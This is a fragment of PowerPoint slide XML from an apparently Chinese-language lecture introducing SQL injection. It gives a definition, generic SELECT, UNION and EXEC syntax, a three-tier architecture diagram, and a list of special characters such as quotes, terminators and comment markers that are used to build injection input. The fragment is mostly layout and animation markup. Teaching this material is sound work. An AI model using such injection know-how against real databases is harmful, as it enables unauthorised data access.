              <a:ext cx="3075935"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向数据库表中插入数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187500" y="4416485"/>
            <a:ext cx="10464094" cy="1652141"/>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SELECT [column-names] FROM [table-name];</a:t>
            </a:r>
            <a:endPar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150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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[select-statement] UNION [select-statement];</a:t>
            </a:r>
            <a:endPar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914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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EXEC [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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-command-name][arguments to command]</a:t>
            </a:r>
            <a:endPar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íṡľíḍè-Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187501" y="3832349"/>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几个关键的</a:t>
            </a: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命令</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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="2" presetClass="entr" presetSubtype="8"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par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>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par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="2" presetClass="entr" presetSubtype="8" decel="60000"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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" decel="6000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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52"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3604345" y="837929"/>
            <a:ext cx="5650060" cy="474140"/>
            <a:chOff x="4336653" y="837929"/>
            <a:chExt cx="41854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336653" y="837929"/>
              <a:ext cx="4185441"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需要使用一些特殊的字符来构建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 name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3153005" y="2039753"/>
            <a:ext cx="6552739" cy="4002532"/>
            <a:chOff x="4197127" y="2392189"/>
            <a:chExt cx="6552739" cy="4002532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4197127" y="2392189"/>
              <a:ext cx="6137398" cy="3786507"/>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 name="矩形 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4413151" y="2608214"/>
              <a:ext cx="6336715" cy="3786507"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3568347" y="2745057"/>
            <a:ext cx="6137397" cy="2807948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>’ ’   字符串指示器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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string</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defRP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语句终结符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>而言为连接（合并）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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注释（单行）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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注释（单行）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRP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注释（多行）</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028775" y="1242429"/>
            <a:ext cx="11305256" cy="1010549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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注入是一种将</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代码插入或添加到应用（用户）的输入参数中的攻击，之后再将这些参数传递给后台</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服务器加以解析并执行。</a:t>
            </a:r>
            <a:endPar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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="663997"/>
            <a:ext cx="2231857" cy="508862"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2231857" cy="508862"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Round Same Side Corner Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2568651" y="828281"/>
              <a:ext cx="508861" cy="165776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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053958" y="1402731"/>
              <a:ext cx="1598005" cy="508859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="138178" tIns="69089" rIns="138178" bIns="69089">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="115189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注入原理</a:t>
              </a:r>
              <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="insert-table_64301"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746845" y="714116"/>
            <a:ext cx="378654" cy="379982"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2764 w 5941"/>
              <a:gd name="T1" fmla="*/ 0 h 5971"/>
              <a:gd name="T2" fmla="*/ 2560 w 5941"/>
              <a:gd name="T3" fmla="*/ 1500 h 5971"/>
              <a:gd name="T4" fmla="*/ 0 w 5941"/>
              <a:gd name="T5" fmla="*/ 1735 h 5971"/>
              <a:gd name="T6" fmla="*/ 234 w 5941"/>
              <a:gd name="T7" fmla="*/ 5971 h 5971"/>
              <a:gd name="T8" fmla="*/ 4471 w 5941"/>
              <a:gd name="T9" fmla="*/ 5736 h 5971"/>
              <a:gd name="T10" fmla="*/ 5737 w 5941"/>
              <a:gd name="T11" fmla="*/ 3269 h 5971"/>
              <a:gd name="T12" fmla="*/ 5941 w 5941"/>
              <a:gd name="T13" fmla="*/ 203 h 5971"/>
              <a:gd name="T14" fmla="*/ 2967 w 5941"/>
              <a:gd name="T15" fmla="*/ 408 h 5971"/>
              <a:gd name="T16" fmla="*/ 4036 w 5941"/>
              <a:gd name="T17" fmla="*/ 956 h 5971"/>
              <a:gd name="T18" fmla="*/ 2967 w 5941"/>
              <a:gd name="T19" fmla="*/ 408 h 5971"/>
              <a:gd name="T20" fmla="*/ 4036 w 5941"/>
              <a:gd name="T21" fmla="*/ 1359 h 5971"/>
              <a:gd name="T22" fmla="*/ 2967 w 5941"/>
              <a:gd name="T23" fmla="*/ 1907 h 5971"/>
              <a:gd name="T24" fmla="*/ 2967 w 5941"/>
              <a:gd name="T25" fmla="*/ 2314 h 5971"/>
              <a:gd name="T26" fmla="*/ 4036 w 5941"/>
              <a:gd name="T27" fmla="*/ 2862 h 5971"/>
              <a:gd name="T28" fmla="*/ 2967 w 5941"/>
              <a:gd name="T29" fmla="*/ 2314 h 5971"/>
              <a:gd name="T30" fmla="*/ 469 w 5941"/>
              <a:gd name="T31" fmla="*/ 5502 h 5971"/>
              <a:gd name="T32" fmla="*/ 2560 w 5941"/>
              <a:gd name="T33" fmla="*/ 1969 h 5971"/>
              <a:gd name="T34" fmla="*/ 1912 w 5941"/>
              <a:gd name="T35" fmla="*/ 3654 h 5971"/>
              <a:gd name="T36" fmla="*/ 1563 w 5941"/>
              <a:gd name="T37" fmla="*/ 3376 h 5971"/>
              <a:gd name="T38" fmla="*/ 1152 w 5941"/>
              <a:gd name="T39" fmla="*/ 4717 h 5971"/>
              <a:gd name="T40" fmla="*/ 1249 w 5941"/>
              <a:gd name="T41" fmla="*/ 4843 h 5971"/>
              <a:gd name="T42" fmla="*/ 2544 w 5941"/>
              <a:gd name="T43" fmla="*/ 4499 h 5971"/>
              <a:gd name="T44" fmla="*/ 2589 w 5941"/>
              <a:gd name="T45" fmla="*/ 4332 h 5971"/>
              <a:gd name="T46" fmla="*/ 3148 w 5941"/>
              <a:gd name="T47" fmla="*/ 3269 h 5971"/>
              <a:gd name="T48" fmla="*/ 4002 w 5941"/>
              <a:gd name="T49" fmla="*/ 5502 h 5971"/>
              <a:gd name="T50" fmla="*/ 4465 w 5941"/>
              <a:gd name="T51" fmla="*/ 2862 h 5971"/>
              <a:gd name="T52" fmla="*/ 5534 w 5941"/>
              <a:gd name="T53" fmla="*/ 2314 h 5971"/>
              <a:gd name="T54" fmla="*/ 5534 w 5941"/>
              <a:gd name="T55" fmla="*/ 1907 h 5971"/>
              <a:gd name="T56" fmla="*/ 4465 w 5941"/>
              <a:gd name="T57" fmla="*/ 1359 h 5971"/>
              <a:gd name="T58" fmla="*/ 5534 w 5941"/>
              <a:gd name="T59" fmla="*/ 1907 h 5971"/>
              <a:gd name="T60" fmla="*/ 4465 w 5941"/>
              <a:gd name="T61" fmla="*/ 956 h 5971"/>
              <a:gd name="T62" fmla="*/ 5534 w 5941"/>
              <a:gd name="T63" fmla="*/ 408 h 5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41" h="5971">
                <a:moveTo>
                  <a:pt x="5737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2764" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2652" y="0"/>
                  <a:pt x="2560" y="91"/>
                  <a:pt x="2560" y="203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2560" y="1500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="1500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="1500"/>
                  <a:pt x="0" y="1605"/>
                  <a:pt x="0" y="1735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5736"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5866"/>
                  <a:pt x="105" y="5971"/>
                  <a:pt x="234" y="5971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4236" y="5971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4366" y="5971"/>
                  <a:pt x="4471" y="5866"/>
                  <a:pt x="4471" y="5736"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4471" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5737" y="3269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5849" y="3269"/>
                  <a:pt x="5941" y="3177"/>
                  <a:pt x="5941" y="3065"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5941" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5941" y="91"/>
                  <a:pt x="5849" y="0"/>
                  <a:pt x="5737" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="408"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="1359"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2967" y="2314"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4036" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4036" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2967" y="2314"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4002" y="5502"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="469" y="5502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="3006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912" y="3654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="3402"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1634" y="3377"/>
                  <a:pt x="1597" y="3367"/>
                  <a:pt x="1563" y="3376"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1528" y="3385"/>
                  <a:pt x="1501" y="3412"/>
                  <a:pt x="1492" y="3447"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1152" y="4717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1143" y="4751"/>
                  <a:pt x="1152" y="4788"/>
                  <a:pt x="1178" y="4813"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1197" y="4833"/>
                  <a:pt x="1222" y="4843"/>
                  <a:pt x="1249" y="4843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1257" y="4843"/>
                  <a:pt x="1266" y="4842"/>
                  <a:pt x="1275" y="4839"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2544" y="4499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2579" y="4490"/>
                  <a:pt x="2606" y="4463"/>
                  <a:pt x="2615" y="4428"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2624" y="4394"/>
                  <a:pt x="2614" y="4357"/>
                  <a:pt x="2589" y="4332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2337" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3148" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4002" y="5502"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="2862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="2862"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="1907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="1907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="1907"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5534" y="956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465" y="956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5534" y="956"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3746790" y="2342047"/>
            <a:ext cx="7024254" cy="822761"/>
            <a:chOff x="3746790" y="2254880"/>
            <a:chExt cx="7024254" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="2465613"/>
              <a:ext cx="5222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浏览器或呈现引擎</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9" name="直接连接符 28"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="266626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3746790" y="2254880"/>
              <a:ext cx="963155" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="963155" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="六边形 26"/>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2366496" y="2887049"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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表示层</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3740871" y="3340338"/>
            <a:ext cx="7030173" cy="822761"/>
            <a:chOff x="3740871" y="3253171"/>
            <a:chExt cx="7030173" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="3463311"/>
              <a:ext cx="5222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如</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C#</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ASP</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.NET</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JSP</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等编程语言</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40" name="直接连接符 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="3663959"/>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740871" y="3253171"/>
              <a:ext cx="960027" cy="822761"/>
              <a:chOff x="2351530" y="4572440"/>
              <a:chExt cx="960027" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="六边形 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="4572440"/>
                <a:ext cx="954108" cy="822761"/>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p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2351530" y="4782580"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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逻辑层</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3746790" y="4373790"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4497356"/>
              <a:ext cx="63326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如</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Microsoft SQL Server</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MySQL</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Oracle</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等数据库</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42" name="直接连接符 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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3746790" y="4286623"/>
              <a:ext cx="963155" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="963155" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="六边形 43"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="2676317"/>
                <a:ext cx="954108" cy="822761"/>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矩形 44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2366496" y="2887049"/>
                <a:ext cx="954108" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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存储层</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1230579" y="2613018"/>
            <a:ext cx="2275030" cy="2275030"/>
            <a:chOff x="1230579" y="2525851"/>
            <a:chExt cx="2275030" cy="2275030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1230579" y="2525851"/>
              <a:ext cx="2275030" cy="2275030"/>
              <a:chOff x="2716147" y="2106202"/>
              <a:chExt cx="1622946" cy="1622946"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="is1ide-Oval 8"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="is1ide-Oval 8"/>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p:txBody>
          </p:sp>
        </p:grpSp>
